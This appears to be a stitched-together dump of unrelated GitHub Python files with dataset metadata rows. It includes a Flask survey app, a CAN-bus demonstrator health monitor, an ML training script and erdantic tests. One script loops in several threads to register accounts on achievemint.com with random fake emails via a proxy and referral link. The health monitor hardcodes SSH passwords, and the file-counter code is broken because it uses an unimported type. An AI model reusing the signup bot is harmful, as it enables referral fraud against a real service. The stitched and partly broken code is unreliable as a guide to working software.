@app.route('/formule')
def reponse():
list_qst = []
if os.path.exists("db/questions.json") == True:
file = open("db/questions.json", "r")
list_qst = json.load(file)
file.close()
list_tache = []
if os.path.exists("db/taches.json") == True:
file = open("db/taches.json", "r")
list_tache = json.load(file)
file.close()
return render_template('formule.html', list_qst=list_qst, list_tache=list_tache)
@app.route('/questions', methods=['POST', 'GET'])
def questions():
list_qst = []
if os.path.exists("db/questions.json") == True:
file = open("db/questions.json", "r")
list_qst = json.load(file)
file.close()
list_tache = []
if os.path.exists("db/taches.json") == True:
file = open("db/taches.json", "r")
list_tache = json.load(file)
file.close()
if request.method == 'POST':
qst = request.form['qst']
tache = request.form['tache']
i = 0
for t in list_tache:
if str(t['id']) == str(tache):
tache = list_tache[i]
break
i = i+1
file = open("db/questions.json", "w")
txt = {
"id": len(list_qst),
"question": qst,
"tache": tache
}
list_qst.append(txt)
file.write(json.dumps(list_qst, indent=True))
file.close()
return render_template('questions.html', list_qst=list_qst, list_tache=list_tache)
@app.route('/update_qst', methods=['POST', 'GET'])
def update_qst():
list_qst = []
if os.path.exists("db/questions.json") == True:
file = open("db/questions.json", "r")
list_qst = json.load(file)
file.close()
list_tache = []
if os.path.exists("db/taches.json") == True:
file = open("db/taches.json", "r")
list_tache = json.load(file)
file.close()
if request.method == 'POST':
id = request.form['id']
qst = request.form['qst']
tache = request.form['tache']
i = 0
for t in list_tache:
if str(t['id']) == str(tache):
tache = list_tache[i]
break
i = i+1
i = 0
for q in list_qst:
if str(q['id']) == str(id):
list_qst[i]['question'] = qst
list_qst[i]['tache'] = tache
break
i = i+1
file = open("db/questions.json", "w")
file.write(json.dumps(list_qst, indent=True))
file.close()
return redirect('/questions')
@app.route('/taches', methods=['POST', 'GET'])
def taches():
list_tache = []
if os.path.exists("db/taches.json") == True:
file = open("db/taches.json", "r")
list_tache = json.load(file)
file.close()
if request.method == 'POST':
tache = request.form['tache']
file = open("db/taches.json", "w")
txt = {
"id": len(list_tache),
"tache": tache
}
list_tache.append(txt)
file.write(json.dumps(list_tache, indent=True))
file.close()
return render_template('taches.html', list_tache=list_tache)
@app.route('/update_tache', methods=['POST', 'GET'])
def update_tache():
list_tache = []
if os.path.exists("db/taches.json") == True:
file = open("db/taches.json", "r")
list_tache = json.load(file)
file.close()
if request.method == 'POST':
id = request.form['id']
tache = request.form['tache']
i = 0
for t in list_tache:
if str(t['id']) == str(id):
list_tache[i]['tache'] = tache
break
i = i+1
file = open("db/taches.json", "w")
file.write(json.dumps(list_tache, indent=True))
file.close()
up_qst()
return redirect('/taches')
def up_qst():
list_qst = []
if os.path.exists("db/questions.json") == True:
file = open("db/questions.json", "r")
list_qst = json.load(file)
file.close()
list_tache = []
if os.path.exists("db/taches.json") == True:
file = open("db/taches.json", "r")
list_tache = json.load(file)
file.close()
i = 0
for q in list_qst:
for t in list_tache:
if str(t['id']) == str(q['id']):
list_qst[i]['tache'] = t
i = i+1
file = open("db/questions.json", "w")
file.write(json.dumps(list_qst, indent=True))
file.close()
@app.route('/add_reponse', methods=['POST', 'GET'])
def add_reponse():
list_qst = []
if os.path.exists("db/questions.json") == True:
file = open("db/questions.json", "r")
list_qst = json.load(file)
file.close()
list_tache = []
if os.path.exists("db/taches.json") == True:
file = open("db/taches.json", "r")
list_tache = json.load(file)
file.close()
list_reponse = []
if os.path.exists("db/reponses.json") == True:
file = open("db/reponses.json", "r")
list_reponse = json.load(file)
file.close()
if request.method == 'POST':
resp = {}
resp['nom'] = request.form['nom']
resp['prenom'] = request.form['prenom']
nom = str(request.form['nom']).upper()+" " + \
str(request.form['prenom']).upper()
resp['sexe'] = request.form['sexe']
resp['profession'] = request.form['profession']
for t in list_tache:
for q in list_qst:
if str(t['id']) == str(q['tache']['id']):
resp['question_'+str(q['id'])] = q
tmp = 'resp'+str(q['id'])
resp['reponse_'+str(q['id'])] = request.form[tmp]
tmp = 'justif'+str(q['id'])
resp['justification_'+str(q['id'])] = request.form[tmp]
list_reponse.append(resp)
file = open("db/reponses.json", "w")
file.write(json.dumps(list_reponse, indent=True))
file.close()
return redirect('/success/'+nom)
else:
return redirect('/formule')
@app.route('/success/<nom>')
def success(nom):
return render_template('success.html', nom=nom)
@app.route('/getData', methods=['POST', 'GET'])
def chart():
res=[]
if request.method == 'POST':
list_reponse = []
if os.path.exists("db/reponses.json") == True:
file = open("db/reponses.json", "r")
list_reponse = json.load(file)
file.close()
list_qst = []
if os.path.exists("db/questions.json") == True:
file = open("db/questions.json", "r")
list_qst = json.load(file)
file.close()
list_tache = []
if os.path.exists("db/taches.json") == True:
file = open("db/taches.json", "r")
list_tache = json.load(file)
file.close()
for t in list_tache:
out = {}
out['tache'] = t['tache']
out['non'] = 0
out['oui'] = 0
for q in list_qst:
if str(q['tache']['id']) == str(t['id']):
id = str(q['id'])
for r in list_reponse:
if str(r['reponse_'+id]).lower() == "non":
out['non'] = out['non']+1
elif str(r['reponse_'+id]).lower() == "oui":
out['oui'] = out['oui']+1
res.append(out)
return json.dumps(res)
if __name__ == '__main__':
app.run(debug=True)
| yahyalazaar/audit_project | __init__.py | __init__.py | py | 7,848 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "flask.Flask",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "os.path.exists",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 15,
"usage_type": "attribute"
},
{
"api_name": "os.mkdir",
"line_number": ... |
40988144291 | from pathlib import Path
from typing import Any, Dict
import json
MockData = Dict[str, Any]
class Mock:
"""
A class that holds the `mock.json` file contents
"""
mock: MockData = {}
@staticmethod
def populate(mock_path: Path) -> None:
if not mock_path.exists():
raise Exception(f"Mock file {mock_path} does not exists!")
with mock_path.open("r") as f:
mock_data: MockData = json.load(f)
Mock.mock = mock_data
| viscript/Ox4Shell | lib/mock.py | mock.py | py | 490 | python | en | code | null | github-code | 36 | [
{
"api_name": "typing.Dict",
"line_number": 5,
"usage_type": "name"
},
{
"api_name": "typing.Any",
"line_number": 5,
"usage_type": "name"
},
{
"api_name": "pathlib.Path",
"line_number": 16,
"usage_type": "name"
},
{
"api_name": "json.load",
"line_number": 21,
... |
72640625383 | """
Project: SSITH CyberPhysical Demonstrator
health.py
Author: Ethan Lew <elew@galois.com>
Date: 08/23/2021
Python 3.8.3
O/S: Windows 10
Component Health Monitoring Objects and Components
"""
import threading
import abc
import collections
import re
import requests
import typing
import struct
import socket
import time
import fabric
import can
import subprocess
from cyberphyslib.canlib import TcpBus, UdpBus
import cyberphyslib.canlib.canspecs as canspecs
import cyberphyslib.canlib.componentids as cids
import cyberphyslib.demonstrator.component as cycomp
import cyberphyslib.demonstrator.can as cycan
from cyberphyslib.demonstrator.logger import health_logger
def ip2int(ip):
"""Convert an IP string to an int"""
packedIP = socket.inet_aton(ip)
return struct.unpack("!L", packedIP)[0]
class HealthMonitor(abc.ABC):
"""Health Monitor Interface
Define test interface and health properties
"""
@abc.abstractmethod
def run_health_test(self) -> bool:
"""test to determine if the system monitored is healthy"""
return True
@property
def is_healthy(self) -> bool:
"""health property"""
return self.run_health_test()
@property
def is_unhealthy(self) -> bool:
return not self.is_healthy
class SshMonitor(HealthMonitor):
"""
Health monitoring involving Ssh Connections
"""
def __init__(self, addr: str, user=None, password=None, **kwargs):
# user and password need to be transformed into proper level of fabric
# kwarg hierarchy
if user:
kwargs["user"] = user
if password:
if "connect_kwargs" in kwargs:
kwargs["connect_kwargs"] = {**{"password": password}, **kwargs}
else:
kwargs["connect_kwargs"] = {"password": password}
self.connection_kwargs = kwargs
self.addr: str = addr
def command(self, command: str):
# NOTE: should I persist the connect rather than make a new one each time?
result = fabric.Connection(self.addr, **self.connection_kwargs).run(command, hide=True)
return result
class PingMonitor(HealthMonitor):
"""
If this monitor receives can succesfully ping the component,
it considers it healthy
"""
def __init__(self, addr: str, *args, **kwargs):
super().__init__(*args, **kwargs)
self.addr = addr
def run_health_test(self) -> bool:
retCode = subprocess.call(["ping","-w","1",self.addr],
stdout=subprocess.DEVNULL)
if retCode == 0:
return True
else:
return False
class HttpMonitor(HealthMonitor):
"""
Health monitoring involving http connections
"""
request_timeout = 1.0
def __init__(self, addr: str, *args, **kwargs):
super().__init__(*args, **kwargs)
self.addr = addr
@abc.abstractmethod
def check_response(self, ret: requests.Response) -> bool:
raise NotImplementedError
def run_health_test(self) -> bool:
try:
ret = requests.get(self.addr, timeout = self.request_timeout)
# check for OK status code
return self.check_response(ret)
except Exception as exc:
health_logger.debug(f"<{self.__class__.__name__}> Exception {exc} has occurred")
return False
class ServiceMonitor(SshMonitor):
"""
Health monitoring of a service on a remote machine (via Ssh)
"""
def __init__(self, service_name: str, *args, **kwargs):
super().__init__(*args, **kwargs)
self.service_name = service_name
def run_health_test(self) -> bool:
try:
ret = self.command(rf"systemctl status {self.service_name}")
# regex match for active and running service
return re.search(r"(Active: active \(running\))", ret.stdout) is not None
except Exception as exc:
health_logger.debug(f"<{self.__class__.__name__}> Exception {exc} has occurred")
return False
class OtaMonitor(HttpMonitor):
"""
Monitor Infotainment Ota Process (via HTTP request)
"""
def check_response(self, ret: requests.Response) -> bool:
return ret.status_code == 200
HeartbeatResponseType = typing.Tuple[float, float]
class BusHeartbeatMonitor(HealthMonitor):
"""
Heartbeat monitor is responsible for
1. sending out the heartbeat requests (REQ)
2. listening for heartbeat acknowledgements (ACK)
3. determining system health from ACK patterns
"""
# length of response buffers (time horizon of ACKs)
maxlen = 5
wait_period = 10.0
@staticmethod
def form_heartbeat_req_msg(req_number: int):
"""form REQ can packet"""
msg = can.Message(arbitration_id=canspecs.CAN_ID_HEARTBEAT_REQ,
data=struct.pack(canspecs.CAN_FORMAT_HEARTBEAT_REQ, req_number))
return msg
def __init__(self, client_ids: typing.Sequence[int]):
self.curr_req_number = 0
self.response_buffer: typing.Dict[int, typing.Deque[float]] = {
c: collections.deque(maxlen=self.maxlen) for c in client_ids
}
self.start_time = time.time()
def submit_response(self, client_id: int, response: HeartbeatResponseType):
"""submit a response from client_id to the ACK buffer"""
if client_id not in self.response_buffer:
# TODO: FIXME: add fault location
idmap = {v: k for k, v in cids.__dict__.items() if isinstance(v, int)}
cname = idmap.get(client_id, "<UNKNOWN>")
print(f"WARNING! Received unanticipated response {client_id} ({cname})")
else:
if response is not None:
self.response_buffer[client_id].append(time.time())
def get_req_msg(self) -> can.Message:
"""generate REQ msg"""
m = self.form_heartbeat_req_msg(self.curr_req_number)
self.curr_req_number += 1
return m
def run_health_test(self) -> bool:
"""implement the heartbeat health:
for a given history of component with component id cid, if the maximum value is
within MAXLEN of the current REQ number, the component is considered healthy
"""
return all(self.run_health_tests())
def run_health_tests(self) -> typing.Dict[typing.Hashable, bool]:
"""return health result for each component entered in the response buffer"""
outcome = {k: True for k in self.response_buffer.keys()}
for cid, buff in self.response_buffer.items():
if len(buff) > 0:
ltime = max(buff)
delta = time.time() - ltime
if delta > self.maxlen:
health_logger.debug(f"ERROR: Component with ID {cid} Has Failed Heartbeat Health Test!")
outcome[cid] = False
else:
if time.time() - self.start_time > self.wait_period:
health_logger.debug(f"ERROR: Component with ID {cid} Has Failed Heartbeat Health Test (No Submissions)!")
outcome[cid] = False
return outcome
class HeartbeatMonitor(threading.Thread):
FREQUENCY = 0.1
def __init__(self):
threading.Thread.__init__(self,daemon=True)
self.services = {
cids.CAN_DISPLAY_FRONTEND:
{
"user" : "pi",
"password": "WelcomeToGalois",
"address" : "10.88.88.5",
"service_name": "can-ui"
},
cids.HACKER_KIOSK_FRONTEND:
{
"user" : "galoisuser",
"password": "WelcomeToGalois",
"address" : "10.88.88.3",
"service_name": "hacker-ui"
},
cids.INFOTAINMENT_THIN_CLIENT:
{
"user" : "pi",
"password": "WelcomeToGalois",
"address" : "10.88.88.2",
"service_name": "infotainment"
}
}
self.https = {
cids.OTA_UPDATE_SERVER_1 : "http://10.88.88.11:5050",
cids.OTA_UPDATE_SERVER_2 : "http://10.88.88.21:5050",
cids.OTA_UPDATE_SERVER_3 : "http://10.88.88.31:5050"
}
self.pings = {
cids.DEBIAN_1 : "10.88.88.11",
cids.FREERTOS_1: "10.88.88.12",
cids.DEBIAN_2_LMCO : "10.88.88.21",
cids.FREERTOS_2_CHERI: "10.88.88.22",
cids.DEBIAN_3 : "10.88.88.31",
cids.FREERTOS_3: "10.88.88.32"
}
self.heartbeat_desc = {
# TCP components
cids.BESSPIN_TOOL_FREERTOS: cids.BESSPIN_TOOL_FREERTOS,
cids.BESSPIN_TOOL_DEBIAN: cids.BESSPIN_TOOL_DEBIAN,
cids.CAN_DISPLAY_BACKEND: cids.CAN_DISPLAY_BACKEND,
cids.HACKER_KIOSK_BACKEND: cids.HACKER_KIOSK_BACKEND,
cids.INFOTAINMENT_BACKEND: cids.INFOTAINMENT_BACKEND,
# UDP components
# NOTE: only active network components can respond
#cids.INFOTAINMENT_SERVER_1: ip2int('10.88.88.11'),
#cids.INFOTAINMENT_SERVER_2: ip2int('10.88.88.21'),
#cids.INFOTAINMENT_SERVER_3: ip2int('10.88.88.31'),
# FreeRTOS is temporaily handled via pings
#cids.FREERTOS_1: ip2int('12.88.88.10'),
#cids.FREERTOS_2_CHERI: ip2int('22.88.88.10'),
#cids.FREERTOS_3: ip2int('32.88.88.10')
}
self.component_monitor = BusHeartbeatMonitor(self.heartbeat_desc)
self.ping_monitors = {k: PingMonitor(addr) for k, addr in self.pings.items()}
self.ota_monitors = {k: OtaMonitor(addr) for k, addr in self.https.items()}
self.service_monitors = {k: ServiceMonitor(params["service_name"], params["address"],
user=params["user"],
password=params["password"]) for k, params in self.services.items()}
self._health_report = {}
def run(self):
while True:
ret = {}
health_logger.debug("Testing OTA")
for k, v in self.ota_monitors.items():
hs = v.is_healthy
ret[k] = hs
if not hs:
health_logger.debug(f"WARNING! {k} HTTP failed health check")
health_logger.debug("Testing Services")
for k, v in self.service_monitors.items():
hs = v.is_healthy
ret[k] = hs
if not hs:
health_logger.debug(f"WARNING! {k} Service failed health check")
health_logger.debug("Testing Ping")
for k, v in self.ping_monitors.items():
hs = v.is_healthy
ret[k] = hs
if not hs:
health_logger.debug(f"WARNING! {k} Ping failed health check")
health_logger.debug("Testing TCP")
health_report = self.component_monitor.run_health_tests()
kmap = {v: k for k, v in self.heartbeat_desc.items()}
ret.update({kmap[k]: v for k, v in health_report.items()})
if not all(health_report.values()):
health_logger.debug(f"Health Status: {health_report}")
health_logger.debug(f"ERROR! TCP Failed")
self._health_report = ret
@property
def health_report(self):
return self._health_report
| GaloisInc/BESSPIN-Tool-Suite | besspin/cyberPhys/cyberphyslib/cyberphyslib/demonstrator/healthmonitor.py | healthmonitor.py | py | 11,624 | python | en | code | 5 | github-code | 36 | [
{
"api_name": "socket.inet_aton",
"line_number": 35,
"usage_type": "call"
},
{
"api_name": "struct.unpack",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "abc.ABC",
"line_number": 38,
"usage_type": "attribute"
},
{
"api_name": "abc.abstractmethod",
... |
16589607570 | import random
import requests
import codecs
import json
import re
import queue
import time
from threading import Thread
requests.packages.urllib3.disable_warnings()
proxy = '127.0.0.1:8888'
def sec():
while True:
headers = {
'Referer': 'https://www.achievemint.com/signup?referral=1&utm_campaign=YOaBLXQNLBg%3D%0A',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2767.4 Safari/537.36',
'Content-Type': 'application/x-www-form-urlencoded'
}
try:
c = '{0}@gmail.com'.format(random.randint(999999,999999999999))
work = False
prozy = {
'http': proxy,
'https': proxy
}
s = requests.session()
r = s.get(
"http://tinyurl.com/k44xy3f",
verify=False,
timeout=6,
proxies=prozy,
headers=headers
)
auth = re.findall('authenticity_token" value="(.*?)"', r.text)[0]
va = re.findall('acceptedTos" type="checkbox" value="(.*?)"', r.text)[0]
r = s.post(
"https://www.achievemint.com/",
'utf8=%e2%9c%93&authenticity_token={0}&after_sign_up_path=&user[confirmation_token]=&user[signup_token]=&user[email]={1}&user[password]=dsfdsf@D&user[accepted_tos]=1&user[accepted_tos]={2}&button='.format(auth, c, va),
verify=False,
timeout=6,
proxies=prozy,
headers=headers
)
if 'Welcome to Achievemint!' in r.text:
print(1)
except:
pass
def main():
for _ in range(3):
worker = Thread(target=sec, args=())
worker.start()
if __name__ == '__main__':
main() | breitingerchris/public_code | Python/Achievemint/anker.py | anker.py | py | 1,509 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "requests.packages.urllib3.disable_warnings",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "requests.packages",
"line_number": 10,
"usage_type": "attribute"
},
{
"api_name": "random.randint",
"line_number": 21,
"usage_type": "call"
},
{
"... |
4828779456 | import torch
from torch import nn
import pickle
from model import WideResNet
from autoattack import AutoAttack
from torch.utils.data import Dataset
from torch.utils.data import DataLoader
from torchvision import datasets, transforms, models
class ImageDataset(Dataset):
def __init__(self, file):
super().__init__()
data, label = pickle.load(open(file,'rb'))
self.data = self.transform(data)
self.label = label
def transform(self, data):
data = torch.Tensor(data).permute(0,3,1,2).contiguous().div(255)
transform_func = transforms.Compose([
transforms.RandomCrop(size = data.shape[-1], padding = 2),
transforms.RandomHorizontalFlip(),
transforms.Normalize(mean=(0.4914, 0.4822, 0.4465),
std=(0.247, 0.243, 0.261))]
)
augmented_data = transform_func(data)
return augmented_data
def __getitem__(self, idx):
return self.data[idx], self.label[idx]
def __len__(self):
return len(self.label)
device = 2
batch_size = 1024
#model = WideResNet(32,10).to(device)
ds = ImageDataset('./data/cifar_train.pt')
model = models.__dict__['resnet50']().to(device)
model.load_state_dict(torch.load('./save/model.pt'))
transform_func = transforms.Compose([transforms.ToTensor(),
transforms.RandomCrop(size = 32, padding = 2),
transforms.RandomHorizontalFlip(),
transforms.Normalize(mean=(0.4914, 0.4822, 0.4465),
std=(0.247, 0.243, 0.261))])
#ds = datasets.CIFAR10('data',train=True,transform=transform_func)
dl = DataLoader(ds,batch_size=batch_size,shuffle=True,pin_memory=True)
criterion = nn.CrossEntropyLoss()
optimizer = torch.optim.Adam(model.parameters(), 0.001)
model.eval()
while True:
for i, (x,y) in enumerate(dl,start=1):
x = x.to(device)
y = y.to(device)
optimizer.zero_grad()
pred = model(x)
loss = criterion(pred, y)
loss.backward()
optimizer.step()
print(i, ((pred.argmax(-1)==y).sum()/len(y)).item(), loss.item())
if i%10==0: torch.save(model.state_dict(),'./save/model.pt')
| AmadeusloveIris/AutoAdversarialTraining | test.py | test.py | py | 2,316 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "torch.utils.data.Dataset",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "pickle.load",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "torch.Tensor",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "torchvision.transfo... |
19915052730 | """
Write a function that takes directory path, a file extension and an optional tokenizer.
It will count lines in all files with that extension if there are no tokenizer.
If a the tokenizer is not none, it will count tokens.
For dir with two files from hw1.py:
#>>> universal_file_counter(test_dir, "txt")
6
#>>> universal_file_counter(test_dir, "txt", str.split)
6
"""
import glob
import os
from pathlib import Path
from typing import Callable, Optional, TextIO
def tokenizer_generator(file_handler: TextIO, tok: Optional[Callable]) -> Generator[int, None, None]:
buffer = ""
char = " "
while True:
char = file_handler.read(1)
if not char:
yield 1 # buffer
break
buffer += char
if len(tok(buffer)) == 1:
continue
else:
yield 1 # tok(buffer)[0]
buffer = tok(buffer)[1]
def universal_file_counter(
dir_path: Path, file_extension: str, tokenizer: Optional[Callable] = None
) -> int:
counter = 0
for file in Path(dir_path).glob("*." + file_extension):
with open(file) as f:
if tokenizer is not None:
for token in tokenizer_generator(f, tokenizer):
counter += token
else:
counter += sum(1 for _ in f)
return counter
| Abbath90/python_epam | homework9/task3/file_counter.py | file_counter.py | py | 1,333 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "typing.TextIO",
"line_number": 17,
"usage_type": "name"
},
{
"api_name": "typing.Optional",
"line_number": 17,
"usage_type": "name"
},
{
"api_name": "typing.Callable",
"line_number": 17,
"usage_type": "name"
},
{
"api_name": "pathlib.Path",
"lin... |
20604733756 | from sklearn import preprocessing
from pandas import read_csv
from sklearn.model_selection import train_test_split
from keras.layers import Dense
from keras.models import Sequential
from keras.optimizers import Adam
from sklearn.metrics import r2_score
from matplotlib import pyplot as plt
df = read_csv("C:\Code\RNASeqAnalysis\Data\CentData.csv", header = 0)
survival = df.Survival
genelist = df.drop(["UUID", "Survival"], axis = 1)
scaler = preprocessing.StandardScaler().fit(genelist)
X_train, X_val, Y_train, Y_val = train_test_split(genelist, survival, test_size = .2)
X_tprep = scaler.transform(X_train)
X_vprep = scaler.transform(X_val)
#print(X_vprep, X_vprep, Y_train, Y_val)
model = Sequential()
model.add(Dense(750, input_shape = (60488,), activation ='relu'))
model.add(Dense(750, activation = 'relu'))
model.add(Dense(750, activation = 'relu'))
model.add(Dense(750, activation = 'relu'))
model.add(Dense(750, activation = 'relu'))
model.add(Dense(750, activation = 'relu'))
model.add(Dense(750, activation = 'relu'))
model.add(Dense(750, activation = 'relu'))
model.add(Dense(750, activation = 'relu'))
model.add(Dense(750, activation = 'relu'))
model.add(Dense(1,))
model.compile(Adam(lr = .00000075), 'mean_squared_error')
history = model.fit(X_tprep,Y_train, epochs = 6500, validation_split = .25, verbose = 0)
print("Model compiled and trained")
Yval_pred = model.predict(X_vprep)
rscore = r2_score(Y_val,Yval_pred)
Yval_pred2 = model.predict(X_tprep)
rscore1 = r2_score(Y_train, Yval_pred2)
print("R2 score (Validation Data): " + str(rscore))
print("R2 score (Training Data): " + str(rscore1))
model.save(R'C:\Users\tjmcg\source\repos\RNAseqFinal\RNAseqFinal\weights.h5')
history_dict = history.history
plt.figure()
plt.yscale("log")
plt.plot(history_dict['loss'], 'bo', label = 'training loss')
plt.plot(history_dict['val_loss'], 'r', label = 'val training loss')
plt.show()
| taytay191/RNAseqAnalysis | RNAseqFinal/model.py | model.py | py | 1,905 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pandas.read_csv",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "sklearn.preprocessing.StandardScaler",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "sklearn.preprocessing",
"line_number": 14,
"usage_type": "name"
},
{
"api_na... |
2063569811 | from functools import cache
from . import get_track_data, get_countries_charts
import pandas as pd
@cache
def get_basic_track_features():
tracks = get_track_data()
isrc_cols = tracks.columns[tracks.columns.str.contains("isrc")].tolist()
album_cols = tracks.columns[tracks.columns.str.contains("album")].tolist()
artist_cols = tracks.columns[tracks.columns.str.contains("artist")].tolist()
other_irrelevant_cols = ["name", "preview_url", "genres"]
irrelevant_cols = isrc_cols + album_cols + artist_cols + other_irrelevant_cols
track_feats = tracks.drop(columns=irrelevant_cols)
track_feats["single_release"] = tracks.album_type == "single"
track_feats = track_feats.dropna()
return track_feats
countries_charts = get_countries_charts()
track_feats = get_basic_track_features()
@cache
def get_track_feature_region_dataset():
"""
Returns a dataframe with the track features for each track that only charted in one region. Oceania is removed because of low number of observations.
"""
charting_tracks_by_region = countries_charts.drop_duplicates(
subset=["id", "geo_region"]
)[["id", "geo_region"]].rename(columns={"geo_region": "region"})
tracks_charting_only_in_one_region = charting_tracks_by_region[
~charting_tracks_by_region.duplicated(keep=False, subset=["id"])
].reset_index(drop=True)
region_tracks_features = pd.merge(
track_feats, tracks_charting_only_in_one_region, on="id"
).set_index("id")
region_track_feats_dataset = region_tracks_features.copy().loc[
region_tracks_features.region != "Oceania"
]
region_track_feats_dataset.region = (
region_track_feats_dataset.region.cat.remove_unused_categories()
)
return region_track_feats_dataset
@cache
def get_track_feature_subregion_dataset():
"""
Returns a dataframe with the track features for each track that only charted in one out of four hand-picked subregion
(Western Europe, Northern America, Eastern Asia, or Latin America and the Caribbean).
"""
charting_tracks_by_subregion = countries_charts.drop_duplicates(
subset=["id", "geo_subregion"]
)[["id", "geo_region", "geo_subregion"]].rename(
columns={"geo_region": "region", "geo_subregion": "subregion"}
)
tracks_charting_only_in_one_subregion = charting_tracks_by_subregion[
~charting_tracks_by_subregion.duplicated(keep=False, subset="id")
].reset_index(drop=True)
subregion_tracks_features = pd.merge(
track_feats, tracks_charting_only_in_one_subregion, on="id"
).set_index("id")
subregion_selection = subregion_tracks_features.copy().loc[
subregion_tracks_features.subregion.isin(
[
"Northern America",
"Latin America and the Caribbean",
"Western Europe",
"Eastern Asia",
]
)
]
subregion_selection.subregion = (
subregion_selection.subregion.cat.remove_unused_categories()
)
subregion_selection.region = (
subregion_selection.region.cat.remove_unused_categories()
)
return subregion_selection
if __name__ == "__main__":
print(get_track_feature_region_dataset())
| Sejmou/exploring-spotify-charts | data-collection-and-exploration/helpers/model.py | model.py | py | 3,256 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "functools.cache",
"line_number": 6,
"usage_type": "name"
},
{
"api_name": "pandas.merge",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "functools.cache",
"line_number": 25,
"usage_type": "name"
},
{
"api_name": "pandas.merge",
"line_... |
938934612 | import os
import json
class Settings:
def __init__(self, settings_directory, settings_default):
self.settings_directory = settings_directory
self.settings_default = settings_default
self.settings_file = os.path.join(self.settings_directory, "settings.json")
# Make sure a settings file with all expected values exists
self.__add_new_settings()
def __add_new_settings(self):
if not os.path.isdir(self.settings_directory):
os.makedirs(self.settings_directory)
settings = self.get_settings()
for key in self.settings_default:
try:
settings[key]
except KeyError:
self.set_setting(key, self.settings_default[key])
def save(self, settings) -> None:
with open(self.settings_file, "w") as file:
file.write(json.dumps(settings))
file.close()
def set_setting(self, key, value) -> None:
settings = self.get_settings()
settings[key] = value
self.save(settings)
def get_setting(self, setting: str) -> any:
with open(self.settings_file, "r") as file:
settings = json.loads(file.read())
try:
return settings[setting]
except KeyError:
return None
def get_settings(self) -> dict:
if os.path.isfile(self.settings_file):
with open(self.settings_file, "r") as file:
results = json.loads(file.read())
changed = False
if 'ftp_password' in results and results['ftp_password'] and len(results['ftp_password']) < 8:
results['ftp_password'] = self.settings_default['ftp_password']
changed = True
if 'ftp_username' in results and results['ftp_username'] and len(results['ftp_username']) < 5:
results['ftp_username'] = self.settings_default['ftp_username']
changed = True
if changed:
results['enable_ftp_server'] = False
self.save(results)
return results
return {}
| ChimeraOS/chimera | chimera_app/settings.py | settings.py | py | 2,180 | python | en | code | 189 | github-code | 36 | [
{
"api_name": "os.path.join",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 10,
"usage_type": "attribute"
},
{
"api_name": "os.path.isdir",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": ... |
12487564602 | import filecmp
import subprocess
import pytest
from typer.testing import CliRunner
import erdantic as erd
from erdantic.cli import app, import_object_from_name
import erdantic.examples.dataclasses as examples_dataclasses
import erdantic.examples.pydantic as examples_pydantic
from erdantic.examples.pydantic import Party, Quest
from erdantic.exceptions import ModelOrModuleNotFoundError
from erdantic.version import __version__
runner = CliRunner()
def test_import_object_from_name():
assert import_object_from_name("erdantic.examples.pydantic.Party") is Party
assert import_object_from_name("erdantic.examples.pydantic.Quest") is Quest
assert import_object_from_name("erdantic") is erd
assert import_object_from_name("erdantic.examples.pydantic") is examples_pydantic
with pytest.raises(ModelOrModuleNotFoundError):
import_object_from_name("erdantic.not_a_module")
with pytest.raises(ModelOrModuleNotFoundError):
import_object_from_name("erdantic.examples.pydantic.not_a_model_class")
def test_draw(tmp_path):
# With library for comparison
path_base = tmp_path / "diagram_base.png"
erd.draw(Party, out=path_base)
assert path_base.exists()
# With CLI
path1 = tmp_path / "diagram1.png"
result = runner.invoke(app, ["erdantic.examples.pydantic.Party", "-o", str(path1)])
assert result.exit_code == 0
assert path1.exists()
assert filecmp.cmp(path1, path_base)
# python -m erdantic
path2 = tmp_path / "diagram2.png"
result = subprocess.run(
["python", "-m", "erdantic", "erdantic.examples.pydantic.Party", "-o", str(path2)],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=True,
)
assert result.returncode == 0
assert path2.exists()
assert filecmp.cmp(path2, path_base)
def test_with_terminus(tmp_path):
# With library for comparison
path_base = tmp_path / "diagram_base.png"
erd.draw(Party, out=path_base, termini=[Quest])
assert path_base.exists()
# With CLI
path1 = tmp_path / "diagram1.png"
result = runner.invoke(
app,
[
"erdantic.examples.pydantic.Party",
"-t",
"erdantic.examples.pydantic.Quest",
"-o",
str(path1),
],
)
assert result.exit_code == 0
assert path1.exists()
assert filecmp.cmp(path1, path_base)
def test_with_modules(tmp_path):
# With library for comparison
path_base = tmp_path / "diagram_base.png"
erd.draw(Quest, examples_dataclasses, out=path_base)
assert path_base.exists()
# With CLI
path1 = tmp_path / "diagram1.png"
result = runner.invoke(
app,
[
"erdantic.examples.pydantic.Quest",
"erdantic.examples.dataclasses",
"-o",
str(path1),
],
)
assert result.exit_code == 0
assert path1.exists()
assert filecmp.cmp(path1, path_base)
# With library for comparison, all pydantic classes
path_base_all_pydantic = tmp_path / "diagram_base_all_pydantic.png"
erd.draw(Quest, examples_dataclasses, examples_pydantic, out=path_base_all_pydantic)
assert path_base_all_pydantic.exists()
# With CLI without limit_search_models_to
path2 = tmp_path / "diagram2.png"
result = runner.invoke(
app,
[
"erdantic.examples.pydantic.Quest",
"erdantic.examples.dataclasses",
"erdantic.examples.pydantic",
"-o",
str(path2),
],
)
assert result.exit_code == 0
assert path2.exists()
assert filecmp.cmp(path2, path_base_all_pydantic)
# With CLI with limit_search_models_to
path3 = tmp_path / "diagram3.png"
result = runner.invoke(
app,
[
"erdantic.examples.pydantic.Quest",
"erdantic.examples.dataclasses",
"erdantic.examples.pydantic",
"-o",
str(path3),
